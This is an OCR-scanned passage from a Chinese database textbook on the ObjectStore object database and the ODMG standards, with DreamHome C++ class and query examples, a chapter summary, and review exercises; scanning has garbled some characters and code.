则 该 类 是 可 达 的 ) 用 ObjectStore 的 宏 OS MARK SCHEMA_TYPE 标识 的 类 。 例 如 : 


#include <ostore/ostore.hh> 

#include <ostore/manschem.hh> 

#include “myClasses.hh” /* 定义 持久 类 */ 

OS MARK SCHEMA _ TYPE(Branch); /* 将 Branch 包 括 在 模式 里 */ 

OS MARK SCHEMA _TYPE(SalesStaff); /* 将 SalesStaff 包 括 在 模式 里 */ 


ObjectStore 模式 生成 器 〈ossg) 将 用 这 个 文件 生成 两 个 输出 文件 : 
e 一 个 应 用 程序 的 模式 数据 库 (例如 ，mySchema.adb)， 该 文件 包含 了 与 应 用 程序 可 以 
持久 地 存储 的 对 象 有 关 的 类 型 信息 。 
e 一 个 应 用 程序 的 模式 目标 文件 (例如 ，myShema.obj)， 该 文件 将 与 应 用 程序 链接 在 一 起 。 
应 用 程序 与 模式 生成 器 的 输出 一 样 按 通常 方式 编译 。 然 后 ， 产 生 的 目标 文件 被 链接 ， 以 
生成 可 执行 的 映像 ， 如 图 28-20 所 示 。 
ObjectStore 数据 库 
ObjectStore 数据 库存 储 持久 对 象 ， 可 以 利用 函数 os_database::create 创建 ObjectStore 数 
据 库 。ObjectStore 支持 两 种 类 型 的 数据 库 : 
@ 文件 数据 库 : 一 个 包含 了 ObjectStore 数据 库 的 纯 操 作 系 统 文件 。 
@ rawfs (原始 文件 系统 ) 数据 库 : 由 ObjectStore 服务 器 负责 管理 的 一 个 私有 文件 系统 ， 
独立 于 操作 系统 管理 的 文件 系统 。 
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Normal build process ObjectStore-specific build process 








图 28-20 建立 一 个 ObjectStore 应 用 程序 


ObjectStore 数据 库 被 划分 为 簇 集 ( cluster) 和 段 (segment)。 秘 集 是 ObjectStore 数据 库 
存储 分 配 的 基本 单位 。 当 一 个 持久 对 象 被 创建 ， 存 储 空间 就 从 一 个 簇 集 开 始 分 配 。 簇 集 又 被 
划分 为 段 。 当 数据 库 被 创建 时 ， 通 常会 创建 两 个 段 : 

e 模式 段 : 存储 了 数据 库 的 根 以 及 与 数据 库 中 存储 的 对 象 有 关 的 模式 信息 。 

e 缺 省 段 : 存储 了 用 持久 版 本 的 运算 符 new 创建 的 实体 。 

其 他 的 段 可 以 调用 函数 os_database::create_segment 创建。 注意， 模式 段 不 能 被 用 户 的 
应 用 程序 直接 访问 。 段 的 存储 空间 是 从 一 个 缺 省 的 簇 集 开始 分 配 的 。 当 某 应 用 程序 在 持久 存 
储 器 中 创建 了 一 个 对 象 ， 即 表明 数据 库 包含 了 该 对 象 ， 并 且 是 在 数据 库 的 省 缺 簇 集 的 省 缺 段 
处 创建 该 对 象 的 。 此 外 ， 应 用 程序 可 以 指定 段 ， 在 这 种 情况 下 ， 对 象 将 在 省 缺 复 集 的 指定 段 
处 创建 。 男 外 ， 应 用 程序 还 可 以 指定 簇 集 ， 此 时 ,对象 将 在 指定 的 簇 集 内 创建 。 


28.3.3 ”ObjectStore 中 的 数据 定义 


ObjectStore 可 以 通过 不 同 的 类 库 处 理由 C、C++ 和 Java 等 编程 语言 创建 的 对 象 的 持久 
性 ， 并 且 提 供 了 一 种 工具 ， 使 得 一 种 语言 创建 的 对 象 能 够 被 其 他 语言 创建 的 对 象 访问 。 本 
节 将 讲述 C++ 类 库 ， 该 类 库 中 包含 了 数据 成 员 、 成 员 函 数 以 及 提供 访问 数据 库 功 能 的 计 
数 器 。 

ObjectStore 将 C++ 作为 一 种 模式 语言 使 用 ， 因 此 ObjectStore 数据 库 中 的 任何 元 素 都 必 
须 用 一 个 C++ 类 定义 。 在 ObjectStore 中 ， 持 和 久 性 正 交 于 类 型 (参见 27.3.4 节 )， 对 持久 对 象 
的 支持 是 通过 重 载 new 运算 符 实现 的 ， 这 样 就 允许 对 任何 类 型 的 对 象 都 可 以 动态 地 分 配 持 
入 存 储 空间 。 还 有 一 个 版 本 的 C++， 可 以 用 delete 运算 符 删 除 持久 对 象 ， 释 放 持 久 存 储 空 
间 。 一 旦 分 配 了 持久 存储 空间 ， 指 向 该 存储 空间 的 指针 就 与 指向 虚 存 的 指针 一 样 使 用 。 实 际 
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上 ， 指 向 持久 存储 空间 的 指针 通常 采用 的 是 虚 存 指针 形式 。 

图 28-21 说 明了 对 应 着 部 分 DreamHome 数据 库 模 式 的 一 组 可 能 的 ObjectStore C++ 类 
声明 (在 一 个 “.h” 的 头 文件 里 )， 主 要 包含 了 Branch 类 和 SalesStaff 类 ， 以 及 它们 之 间 的 
联系 (Branch Has SalesStaff，SalesStaff WorksAt Branch ) 。 对 于 熟悉 C++ 的 读者 来 说 ， 该 
模式 中 大 多 数 的 语法 都 是 熟悉 的 。 然 而 ， 我 们 将 详细 讨论 几 个 特殊 的 实现 细节 : 创建 持久 对 
象 、 联 系 和 类 的 范围 。 
通过 重 载 new 运算 符 创 建 持久 对 象 

如 前 所 述 ， 持 久 性 是 通过 重 载 new 运算 符 得 到 的 。 图 28-21 给 出 了 两 个 示例 ， 即 在 
Branch 类 和 SalesStaff 类 的 构造 方法 中 对 运算 符 new 进行 了 重 载 。 例 如 ， 在 Branch 的 构造 
方法 中 ， 有 这 样 的 语句 : 

branchNo = new(dreamhomeDB, os_typespec::get_char(), 4) char[4]; 

在 这 种 情况 下 ， 运 算 符 new 有 三 个 参数 : 

e 一 个 指向 ObjectStore 数据 库 的 指针 。 

e 一 个 指向 新 对 象 的 类 型 声明 的 指针 ， 我们 是 通过 调用 os_typespec 类 中 重 载 的 方法 

get_char 得 到 的 (下 面 将 会 讨论 )。 

e 对 象 的 大 小 。 

通常 ， 这 个 版 本 的 运算 符 new 将 返回 一 个 指向 最 新 分 配 的 存储 空间 的 指针 。 对 象 一 旦 
被 创建 成 持久 的 ， 则 当 指 向 它 的 指针 被 间接 引用 时 ，ObjectStore 将 会 自动 检索 到 该 对 象 。 
图 28-21 给 出 的 例子 只 是 解释 性 的 ， 显然 ,在 一 个 完整 的 实现 中 ,我 们 必须 为 Branch 和 
SalesStaff 的 所 有 属性 分 配 空间 ， 而 不 是 仅仅 是 为 主 关键 字 属 性 分 配 空间 。 注 意 ， 如 果 省 略 
这 些 参 数 ， 并 且 使 用 运算 符 new 的 标准 版 本 ， 即 ; 

branchNo = new char[4]; 
则 会 创建 一 个 临时 对 象 。 
使 用 typespecs 

Typespecs 都 是 os_typespec 类 的 实例 ， 被 用 作 持 久 版 运算 符 new 的 参数 ， 当 数据 库 根 
结 点 被 操作 时 ， 帮 助 维持 类 型 安全 性 (在 28.3.3 节 再 讨论 数据 库 的 根 结 点 )。 一 个 typespec 
代表 一 个 具体 类 型 ， 例 如 char、int 或 者 Branch*。ObjectStore 提供 了 一 些 特殊 函数 用 以 检 
索 各 种 类 型 的 typespec。 某 进程 首次 调用 这 样 的 函数 时 ，ObjectStore 将 为 这 个 进程 分 配 一 个 
typespec 对 象 ， 并 返回 指向 它 的 指针 。 此 后 同一 进程 对 该 函数 的 调用 将 不 会 导致 再 次 分 配 ， 
而 是 返回 指向 同一 个 os_typespec 对 象 的 指针 。 在 图 28-21 中 ,调用 了 get_os_typespec 的 成 
员 函 数 向 Branch 类 和 SalesStaff 类 中 添加 成 员 : 


static os_typespec#get_os_typespec(); 


ObjectStore 模式 生成 器 自动 为 这 个 函数 提供 一 个 主体 ， 并 返回 一 个 指向 这 个 类 的 
typespec 的 指针 。 
在 ObjectStore 中 创建 联系 

Branch 和 SalesStaff 之 间 的 联系 的 处 理 是 通过 声明 了 两 个 互 逆 (inverse) 的 数据 成 员 。 
有 了 这 个 双向 链 以 后 ，ObjectStore 将 自动 地 维护 这 一 联系 的 引用 完整 性 。ObjectStore 提供 
了 定义 联系 的 宏 ,， 图 28-21 用 到 了 两 个 这 样 的 宏 : os_relationship 1 _m 和 os_relationship_ 
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m_1 (还 有 被 称 为 os_relationship 1 1 和 os relationship m_m 的 宏 )。 这 些 宏 定 义 了 设置 和 
获取 联系 的 访问 函数 。 每 次 用 联系 宏 定 义 联系 的 一 方 时 ， 必 须 配 对 地 使 用 联系 宏 定 义 该 联系 
的 男 一 方 (逆向 )。 在 任何 情况 下 ， 这 些 宏 都 有 五 个 参数 .; 





class SalesStaff; 
extern os_Set<SalesStaff*> *salesStaffExtent; 
extern os_database *dreamhomeDB; 
enum PositionType {Manager, Supervisor, Assistant}; 
enum SexType {M, F}; 
struct Date { 
int year; 





int month; 
int day; 
} 
class Branch { 1// 定 义 关 于 Branch 的 类 
char branchNo[4]; 
struct { 
char* street; 
string* city; 
string* postcode} address; 
oOs_relationship_m._1(Branch, Has, SalesStaff, WorksAt, os_Set<SalesStaff*>) Has; 
Branch(char b[4]) fbranchNo = new(dreamhomeDB, os_typespec::get_char(), 4) char[4]; 
strcpy(branchNo, b); } 
/提供 一 个 创建 联系 的 函数 接口 -注意 这 也 建立 了 逆向 联系 WorkRt 
void addStaff(SalesStaff *s) {Has.insert(s);} 
void removeStaff(SalesStaff *s) {Has.remove(s);} 
static os_typespec” get_os_typespec(); 
} 
class Person { 1// 定 义 关 于 Person 的 类 
struct { 
char* fName, 
char* IName} name; 





} 

class Staff: public Person { /定义 关于 Staff 的 类 ， 继 承 自 Person 类 
char staffNo[5]; 
SexType sex; 





PositionType position; 
Date DOB; 
float salary; 
int getAge(); 
void increaseSalary(float increment) {salary += increment; } 
} 
class SalesStaff ; Staff { 1/ 定 义 关于 SalesStaff 的 类 ,继承 自 Staff 类 
Os_relationship_1_m(SalesStaff, WorksAt, Branch, Has, Branch*) WorksAt; 
SalesStaff(char s[5]) {staffNo = new(dreamhomeDB, os_typespec::get_char(), 5) char[5]; 
strcpy(staffNo, s); 
salesStaffExtent->insert(this);} 
~SalesStaff() {salesStaffExtent->remove(this);} 
/1 提供 一 个 创建 联系 的 函数 接口 一 注意 这 也 建立 了 逆向 
// 联系 Has. 
void setBranch(Branch* b) {WorksAt.setvalue(b);} 
Branch* getBranch() {WorksAt.getvalue();} 
static os_typespec* get_os_typespec(); 
} 


图 28-21 部 分 DreamHome 数据 库 模 式 的 ObjectStore C++ 类 声明 
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class: 定义 正在 声明 的 数据 成 员 的 类 。 
member: 正在 声明 的 数据 成 员 的 名 字 。 
inv_class: 定义 逆向 成 员 的 类 的 名 字 。 
inv_member: 逆向 成 员 的 名 字 。 

e value_type: 正在 声明 的 成 员 的 显 式 的 值 类 型 ， 稍 后 讨论 。 

为 了 实例 化 联系 函数 ， 有 一 组 相关 的 联系 “主体 ” 宏 ， 这 些 宏 的 前 4 个 参数 (必须 从 
源 文件 中 调用 ) 都 相同 。 例 如 ， 为 了 与 图 28-21 所 示 的 两 个 联系 宏 匹 配 ， 需 要 用 到 下 面 两 个 
语句 : 

os_rel_m_1 _body(Branch, Has, SalesStaff, WorksAt); 

os_rel_1_m _body(SalesStaff, WorksAt, Branch, Has); 


Branch 中 的 方法 addStaff 和 removeStaff 以 及 Staff 中 的 方法 setBranch 和 getBranch 还 
为 这 些 联系 提供 了 一 个 函数 接口 。 还 要 注意 双向 联系 的 透明 性 。 例 如 ， 当 我 们 调用 addStaff 
方法 来 说 明 某 分 公司 (假设 是 bl ) 雇佣 了 (Has) 某 一 给 定编 号 的 职员 (假设 是 s1 )， 则 其 逆 
向 联系 WorksAt (也 就 是 ，s1 WorksAt bl ) 也 同时 被 建立 。 
在 ObjectStore 中 创建 范围 

在 图 28-17 中 ， 我 们 用 ODMG 的 关键 字 extent 定 义 了 类 SalesStaff 的 范围 。 而 在 
图 28-21 的 第 二 行 ， 则 用 的 是 ObjectStore 的 集 类 型 os set 定义 了 SalesStaff 的 范围 。 在 
SalesStaff 的 构造 方法 中 ， 我 们 用 方法 insert 向 类 的 范围 中 插入 了 一 个 对 象 ， 在 析 构 方法 中 
又 用 方法 remove 从 该 类 的 范围 中 将 这 一 对 象 删除 。 


28.3.4 ”ObjectStore 中 的 数据 操作 


本 节 将 简要 介绍 ObjectStore 数据 库 中 的 对 象 的 操作 。 在 持久 存储 空间 可 以 被 访问 之 前 ， 
必须 先 执行 下 列 操作 : 
e 数据 库 必须 已 被 创建 或 者 打开 。 
e 事务 必须 已 经 被 启动 。 
e 数据 库 的 根 必须 已 被 检索 或 者 创建 。 
根 和 人 口 点 对 象 
正如 28.2.2 节 提 到 的 ， 数 据 库 的 根 提供 了 一 种 赋予 对 象 持久 名 字 的 方式 ， 从 而 允许 对 象 
作为 进入 数据 库 的 一 个 初始 入 口 点 (entry point)。 有 了 这 个 人 口 点 ， 任 何 与 之 相关 的 对 象 都 
可 以 通过 导航 〈 即 跟随 数据 成 员 指针 进行 访问 ) 进行 检索 ， 或 者 通过 查询 (也 就 是 在 给 定 集 
合 中 选择 所 有 满足 给 定 谓词 的 元 素 ) 检索 。 图 28-22 给 出 了 上 述 部 分 内 容 的 示例 : 
e 用 数据 库 类 os_database 的 open 方法 打开 数据 库 。 
e 用 宏 0S BEGIN_TXN 和 OS_END_TXN 开始 或 终止 一 个 事务 (第 一 个 参数 是 一 个 标 
识 符 一 一 tx1， 只 是 作为 那个 事务 的 一 个 标号 )。 
e 用 和 集 类 os_Set 的 create 方法 为 SalesStaff 创建 一 个 范围 。 
e 用 数据 库 类 os_database 的 create_root 方 法 创建 两 个 具名 根 (一 个 对 应 于 SalesStaff 
的 范围 ， 另 外 一 个 对 应 于 分 公司 B003 )。 该 方法 返回 一 个 指向 新 根 的 指针 (其 类 型 
为 os_database_root)， 然 后 该 指针 被 set_value 方法 使 用 ， 用 于 指定 与 这 个 根 相 关联 
的 名 字 。 
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e 创建 一 个 表示 B003 分 公司 的 Branch 实例 以 及 两 个 SalesStaff 实例 一 一 SG37 


查询 


和 SG14， 然 后 再 用 类 Branch 的 addStaff 方 法 将 它们 加 入 B003， 作 为 B003 的 
成 员 。 





Os_Set<SalesStaff*> *salesStaffExtent = 0; 

main() { 

1// 初 始 化 0bjectStore 和 和 集 的 使 用 

objectstore::initialize(); os_collection::initialize(); 
Os_typespec *WorksAtType = Branch::get_os_typespec(); 
Os_typespec *salesStaffExtentType = 0s_Set<SalesStaff*>::get_os_typespec(); 

1// 打开 DreamHome 数 据 库 

os_database *dbl = os_database::open(“dreamhomeDB”); 
/开始 一 个 事务 
QOS_BEGIN_TXN(txl, 0, os_transaction::update) 

/在 该 数据 库 中 创建 salesStaff 的 范围 ， 然 后 创建 具名 的 根 
salesStaffExtent = &os_Set<SalesStaff*>::create(db1); 
dbl->create_root("salesStaffExtent_Root”)->set_value(salesStaffExtent, salesStaffExtentType); 

/1 创建 有 两 个 员工 SG37 和 SG14 的 分 公司 B003 
Branch* b1(“B003”); SalesStaff* s1(“SG37”), s2("SG14”); 

/创建 B003 的 根 ， 设 置 这 两 个 员工 在 该 分 公司 工作 
dbl->create_root(“Branch3_Root")->set_value(bl, WorksAtType); 
bl->addStaff(s1); bl->addStaff(s2); 

/结束 事务 并 关闭 数据 库 

OS_END_TXN(txl) 

dbl->close(); 


delete dbl; 
objectstore::shutdown(); 











图 28-22 在 ObjectStore 中 创建 持久 对 象 和 联系 


ObjectStore 提供 了 多 种 检索 数据 库 对 象 的 方式 ， 包 括 导航 式 访问 和 关联 式 访 问 。 图 28-23 
举例 说 明了 部 分 检索 对 象 的 方法 : 
@ 基于 具名 根 的 访问 。 在 前 面 的 例子 中 ， 已 经 为 分 公司 B003 创建 了 一 个 具名 根 ， 现 在 就 


可 以 用 这 个 根 检索 分 公司 对 象 B003， 并 显示 出 其 分 公司 编号 branchNo。 这 是 通过 调 
用 方法 find_root 和 get_value 实现 的 ， 类 似 于 图 28-22 中 所 用 的 方法 create_root 和 set_ 
value。 

使 用 游标 在 集 上 迭代 。 已 经 找到 了 分 公司 对 象 B003 以 后 ， 现 在 就 可 以 用 联系 Has 
在 分 配 到 该 分 公司 工作 的 职员 的 集 上 和 迭代 (在 图 28-21 中 联系 Has 被 定义 为 一 个 集 类 
型 ，os_Set)。ObjectStore 的 集 机 制 提供 了 若干 类 ， 以 帮助 在 集 内 导航 。 本 例 使 用 了 
游标 机 制 (cursor mechanism)， 游 标 机 制 主要 用 于 在 集中 指定 位 置 。 游 标 可 以 用 于 实 
现 对 集 的 遍历 ， 也 可 以 用 于 检索 、 插 入 、 移 动 和 替换 元 素 。 为 了 找 出 分 公司 B003 中 
的 销售 人 员 ， 可 以 使 用 通过 联系 Has 定义 的 销售 人 员 集 合 ， 即 aBranch->Has， 创 建 
参数 化 模板 类 os_Cursor 的 一 个 实例 c。 然 后 使 用 游标 的 first 方法 ( 移 到 集 的 第 一 个 
元 素 处 )、next 方法 〈( 移 到 集 的 下 一 个 元 素 处 ) 和 more 方法 (确定 集中 是 否 还 有 其 他 
的 元 素 ) 在 这 个 集 上 迭代 。 


前 两 个 例子 都 是 基于 导航 式 的 访问 ， 剩 下 的 两 个 例子 就 是 基于 关联 式 的 访问 : 
@ 基于 一 或 多 个 数据 成 员 的 值 查找 单个 对 象 。ObjectStore 支持 对 持久 对 象 的 关联 式 访 
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问 。 我 们 用 SalesStaff 的 范围 来 解释 这 种 机 制 的 用 法 。 作 为 第 一 个 例子 ， 我 们 用 方法 

query_pick 检索 属于 该 范围 的 一 个 元 素 ， 方 法 query_pick 有 三 个 参数 : 

里 一 个 字符 串 ， 说 明正 在 被 查询 的 集合 的 元 素 类 型 (在 本 例 中 为 SalesStaff* ) 。 

里 一 个 字符 串 ， 表 示 能 够 被 查询 选中 的 元 素 必 须 满 足 的 条 件 (本 例 是 指数 据 成 员 
StaffNo 的 值 为 SG37 的 元 素 )。 

里 一 个 指向 数据 库 的 指针 ， 该 数据 库 包 含 了 正在 被 查询 的 集 (本 例 为 dbl )。 

@ 基于 一 个 或 多 个 数据 成 员 的 值 检索 对 象 的 集合 。 为 了 扩展 上 面 的 例子 ,我 们 用 方法 
query 返回 集合 中 满足 某 一 条 件 的 多 个 元 素 (本 例 是 指 那些 工资 超过 30 000 英镑 的 员 
工 )。 这 个 查询 将 返回 男 外 一 个 集合 ， 同 样 ， 我们 可 以 使 用 游标 在 该 集合 的 成 员 上 适 
代 ， 并 显示 出 员工 的 编号 staffNo。 

本 节 我 们 仅仅 对 OODBMS ObjectStore 的 特征 进行 了 初探 ， 感 兴趣 的 读者 可 以 参阅 

ObjectStore 的 系统 文档 以 获取 更 多 的 信息 。 


O08_Set<SalesStaff*> *salesStaffExtent = 0; 
main() { 





Branch* aBranch; 
SalesStaff* p; 
1/1 初始 化 0bjectStore 和 和 集 的 使 用 
objectstore::initialize(); os_collection::initialize(); 
Os_typespec *WorksAtType = Branch::get_os_typespec(); 
Os_typespec *salesStaffExtentType = 0s_Set<SalesStaff’>::get_os_typespec(); 
/1 打开 数据 库 并 开始 一 个 事务 
os_database *db] = os_database::open(“dreamhomeDB”); 
OS_BEGIN_TXN(txl, 0, os_transaction::update) 

// 查 询 1. 找 到 名 为 Branch3 的 根 ， 并 用 游标 找 出 在 该 分 公司 工作 的 员工 
aBranch = (Branch*)(db1->find_root(“Branch3_Root”)->get_value(WorksAtType); 基于 具名 
cout << “Retrieval of branch B003 root:” << aBranch->branchNo << “\n”; 的 根 访问 

// 查 询 2. 现 在 找 出 在 该 分 公司 工作 的 所 有 员工 
Os_Cursor<SalesStaff*> c(aBranch->Has); 
count << “Staff associated with branch B003: \n” | 用 游标 在 
for (p = cfirst(); c.more(); p = c.next()) 集 上 迭代 

cout << p->staffNo << “\m”; 

1// 查 询 3. 找 到 名 为 SalesStaffExtent 的 根 ， 并 在 该 范围 内 执行 查询 

salesStaffExtent = (0s_Set<SalesStaff*>*) 
(db1l->find_root(“salesStaffExtent_Root”)->get_value(salesStaffExtentType); | 





查找 
对 象 


aSalesPerson = salesStaffExtent->query_pick("“SalesStaff*”, “Istremp(staffNo, \“SG37\”)”, db1); 
cout << “Retrieval of specific member of sales staff: ”<< aSalesPerson.staffNo << “\m”; 
1/ 查询 4. 在 该 范围 内 执行 另 一 查询 ， 找 出 薪酬 高 的 员工 ( 用 游标 遍历 返回 的 集合 
Os_Set<SalesStaff*> &highlyPaidStaff = 
salesStaffExtent->query(" SalesStaff*”, “salary > 30000”, db1); 
cout << “Retrieval of highly paid staff: \n”; 对 象 集 
Os_Cursor<SalesStaff*> c(highlyPaidStaff ); 的 检索 
for (p = c.first(); c.more(); p = c.next()) 
cout << p->staffNo << “\m”; 
OS_END_TXN(tx1) 


db1->close(); 
delete dbl; 
objectstore::shutdown(); 











图 28-23 ObjectStore 中 的 查询 
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本 章 小 结 

e 对 象 管理 组 ( Object Management Group，OMG) 是 1989 年 创建 的 一 个 国际 非 盘 利 性 的 工业 联盟 ， 
旨 在 解决 对 象 标准 的 问题 。OMG 的 主要 目的 是 在 软件 工程 中 推广 面向 对 象 的 方法 ， 并 开发 标准 使 
得 对 象 的 位 置 、 环 境 、 语 言 等 特性 对 其 他 对 象 完 全 透明 。 

e@ 1990 年 ，OMG 首次 发 布 了 对 象 管理 结构 ( Object Management Architecture，OMA ) 指南 。 该 指南 
为 面向 对 象 的 语言 、 系 统 、 数 据 库 和 应 用 程序 框架 制定 了 统一 的 术语 ; 给 出 了 面向 对 象 系统 的 抽象 
框架 ; 制定 了 一 组 技术 和 结构 的 目标 ; 提出 了 使 用 面向 对 象 技术 的 分 布 式 应 用 的 一 种 参考 模型 。 关 
于 参考 模型 确定 了 四 个 领域 的 标准 : 对 象 模 型 (OM)、 对 象 请 求 代理 (ORB)、 对 象 服务 和 公共 设施 。 

e CORBA 定义 了 一 个 基于 ORB 环境 的 架构 。 该 架构 是 所 有 OMG 构件 的 基础 ，OMG 构件 定义 了 
ORB 的 组 成 部 分 和 ORB 的 关联 结构 。 利 用 GIOP 或 者 IOP， 一 个 基于 CORBA 的 程序 就 可 以 实 
现 与 另外 一 个 基于 CORBA 的 程序 的 互 操作 ， 这 种 互 操作 是 一 种 跨越 不 同 的 供应 商 、 平 台 、 操 作 
系统 、 编 程 语言 和 网 络 的 互 操作 。 部 分 CORBA 的 元 素 包 括 实现 中 立 的 接口 定义 语言 ( Interface 
Definition Language，IDL)、 类 型 模型 ( type model)、 接 口 库 ( interface repository)、 获 取 接 口 和 对 
象 规范 的 方法 以 及 实现 OID 和 字符 串 之 间 的 转换 的 方法 。 

e OMG 已 经 提出 了 许多 其 他 的 规范 , 包括 : UML (统一 建 模 语 言 )，UML 提供 了 一 种 通用 的 描述 软 
件 模型 的 语言 ， MOF (元 对 象 设 施 )，MOF 定义 了 一 种 通用 的 抽象 的 元 模型 描述 语言 (CORBA、 
UML 和 CWM 都 是 MOF 兼容 的 元 模型 ) ; XMI (XML 元 数据 交换 )，XMI 将 MOF 映射 为 XML ; 
CWM (公共 仓库 元 模型 ),CWM 定义 了 一 种 通常 出 现在 数据 仓库 和 商务 智能 领域 的 元 数据 的 元 模型 。 

e OMG 还 引入 了 模型 驱动 架构 (MDA) 的 概念 ，MDA 是 建立 在 上 述 四 种 建 模 规范 基础 之 上 的 实现 
系统 规范 和 互 操作 性 的 方法 。MDA 基于 这 样 一 个 前 提 : 系统 应 该 独立 于 所 有 的 硬件 和 软件 。 因 此 ， 
尽管 软件 和 硬件 可 能 随 着 时 间 而 变化 ， 但 是 规范 依然 适用 。 重 要 的 是 ，MDA 致力 于 系统 整个 的 生 
命 周期 ， 从 分 析 和 设计 到 实现 、 测 试 、 构 件 装配 以 及 部 署 。 

e@ 几 个 重要 的 供应 商 组 成 的 对 象 数据 管理 组 (ODMG) 旨 在 制定 OODBMS 的 标准 。ODMG 发 布 了 一 
个 对 象 模型 ， 作 为 描述 数据 库 对 象 语义 的 标准 模型 。 该 模型 非常 重要 ， 因 为 它 确定 了 OODBMS 能 
够 理解 并 且 可 以 执行 的 预定 义 语义 。 使 用 这 些 语 义 的 类 库 和 应 用 程序 的 设计 在 各 种 支持 对 象 模型 的 
OODBMS 之 间 应 该 都 是 可 移植 的 。 

e OODBMS 的 ODMG 架构 的 主要 构件 有 : 对 象 模型 (OM)、 对 象 定 义 语 言 (ODL)、 对 象 查询 语言 
(OQL) 以 及 与 C++、Java、Smalltalk 的 语言 绑 定 。 

e ODMG OM 是 OMG OM 的 一 个 超 集 ，ODMG OM 使 得 设计 和 实现 都 可 以 在 兼容 系统 之 间 移 植 。 模 
型 的 基本 建 模 元 语 是 对 象 (object) 和 文字 (literal) 。 只 有 对 象 具有 唯一 标识 符 。 对 象 和 文字 均 可 用 
类 型 ( type) 归 类 。 具 有 某 一 相同 类 型 的 所 有 对 象 和 文字 表现 出 共同 的 行为 和 状态 。 行 为 是 由 一 组 
可 以 在 对 象 上 执行 或 者 可 以 被 对 象 执行 的 操作 ( operation) 定义 的 。 状 态 是 由 对 象 携带 的 一 组 性 质 
(property) 的 值 定 义 的 。 一 个 性 质 可 以 是 对 象 的 一 个 属性 (attribute)， 也 可 以 是 对 象 与 一 个 或 多 个 
对 象 之 间 的 联系 (relationship ) 。 

9 对 象 定义 语言 (Object Definition Language，ODL) 是 一 种 为 ODMG 兼容 系统 定义 其 对 象 类 型 声明 
的 语言 ， 等 价 于 传统 DBMS 中 的 数据 定义 语言 (DDL)。ODL 定义 类 型 的 属性 和 联系 ， 说 明 操 作 的 
签名 ， 但 不 给 出 签名 的 具体 实现 。 

@ 对 象 查询 语言 ( Object Query Language，OQL) 采用 与 SQL 类 似 的 语法 ， 提 供 了 对 对 象 数据 库 的 说 
明 性 访问 。OQL 并 不 提供 显 式 的 更 新 运算 符 ， 而 是 将 其 留 给 在 对 象 类 型 中 定义 的 操作 来 执行 。 一 个 
OQL 查询 为 返回 一 个 对 象 的 函数 ， 对 象 的 类 型 可 以 根据 查询 表达 式 从 运算 符 推断 出 来 。OQL 既 可 
被 用 于 关联 式 访 问 ， 又 可 被 用 于 导航 式 访 问 。 
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28.1 
28.2 
28.3 
28.4 


28.5 
28.6 
28.7 


讨论 ODMG 对 象 模型 的 主要 概念 。 举 出 一 例 解释 说 明 每 一 个 概念 。 

ODMG 对 象 定义 语言 的 功能 是 什么 ? 

ODMG 对 象 操作 语言 的 功能 是 什么 ? 

ODMG GROUP BY 子 句 与 SQL GROUP BY 子 句 的 区 别 是 什么 ? 给 出 一 个 具体 实例 解释 你 的 
回答 。 

ODMG 的 聚集 函数 与 SQL 的 聚集 函数 有 何 区 别 ? 给 出 一 个 具体 实例 解释 你 的 回答 。 

ODMG 对 象 交换 格式 的 功能 是 什么 ? 

简单 讨论 ODMG C++ 语言 绑 定 的 工作 原理 。 


习题 


28.8 


将 习题 27.22 中 生成 的 Hotel 样 例 研 究 的 面向 对 象 数据 库 设计 映射 为 ODMG ODL， 并 用 OQL 写 
出 下 列 查询 : 

(a) 列 出 所 有 的 旅馆 。 

(b) 列 出 所 有 每 晚 价格 低 于 20 英镑 的 单间 。 

(c) 列 出 所 有 客人 的 名 字 和 城市 。 

(d) 列 出 格 罗 夫 那 酒店 的 所 有 房间 的 价格 和 类 型 。 

(e) 列 出 目前 住 在 格 罗 夫 那 酒店 的 所 有 客人 。 

(f) 列 出 格 罗 夫 那 酒店 的 房间 的 详细 信息 ， 如 果 房 间 已 被 人 住 ， 还 要 列 出 人 住房 间 的 客人 的 名 字 。 
(g) 列 出 住 在 格 罗 夫 那 酒店 的 所 有 客人 的 详细 信息 (guestNo、guestName 和 guestAddress ) 。 

将 OQL 的 答案 和 习题 5.12 中 等 价 的 关系 代数 和 关系 演算 表达 式 进 行 比较 。 

将 习题 27.23 中 生成 的 Project 样 例 研究 的 面向 对 象 的 数据 库 设计 映射 为 ODMG ODL, 并 用 OQL 
写 出 下 列 查询 

(a) 列 出 所 有 的 员工 。 

(b) 列 出 女性 员工 的 详细 信息 。 

(c) 列 出 职位 为 经 理 的 员工 的 名 字 和 住址 。 

(d) 列 出 IT 部 门 所 有 员工 的 名 字 和 住址 。 

(e) 列 出 参与 SCCS 项 目的 员工 的 名 字 。 

(f) 按照 字母 表 顺 序列 出 今年 即将 退休 的 经 理 。 

(g) 列 出 “James Adam” 管 理 的 员工 人 数 。 

(h) 列 出 每 位 员工 的 累积 工作 时 间 表 。 

(i) 列 出 多 于 2 位 员工 参与 的 项 目 信息 ， 包 括 项 目 编号 ， 项 目 名 称 和 参与 该 项 目 员工 的 数目 。 
(4j) 列 出 员工 数目 大 于 10 的 部 门 的 实际 员工 数目 ， 并 为 查询 结果 表 的 各 列 命名 。 


28.10 将 习题 27.24 中 生成 的 Library 样 例 研究 的 面向 对 象 的 数据 库 设 计 映射 为 ODMG ODL， 并 写 出 


下 列 查询 的 OQL。 

(a) 列 出 所 有 图 书 的 名 称 。 

(b) 列 出 所 有 借阅 者 的 详细 信息 。 

(c) 列 出 2012 年 出 版 的 所 有 书籍 的 名 称 。 
(d) 列 出 当前 可 借 书 籍 所 有 存 本 。 

(e) 列 出 《指环 王 》 可 借 的 所 有 存 本 。 


198 


28.11 
28.12 


28.13 


28.14 


锚 七 部 分 对 厅 DBMS 


(f) 列 出 目前 借阅 《指环 王 》 的 借阅 者 名 字 。 

(g) 列 出 当前 有 超期 书籍 的 借阅 者 名 字 。 

(h) 给 出 ISBN 为 “0-321-52306-7” 的 图 书 存 本 的 数目 。 

(i) 给 出 ISBN 为 “0-321-52306-7” 的 图 书 可 借阅 存 本 的 数目 。 

(j) 给 出 ISBN 为 “0-321-52306-7” 的 图 书 累积 借阅 次 数 。 

(k) 列 出 “Peter Bloomfield ”借阅 过 的 图 书 名 称 一 览 表 。 

(1) 列 出 存 本 数目 大 于 3 的 所 有 图 书 的 借阅 者 名 字 。 

(m) 列 出 存在 超期 借阅 的 借阅 者 的 详细 信息 表 。 

(n) 列 出 每 本 图 书 名 称 及 其 借阅 次 数 的 对 应 表 。 

将 习题 27.25 中 生成 的 DreamHome 样 例 研 究 的 面向 对 象 的 数据 库 设计 映射 为 ODMG ODL。 

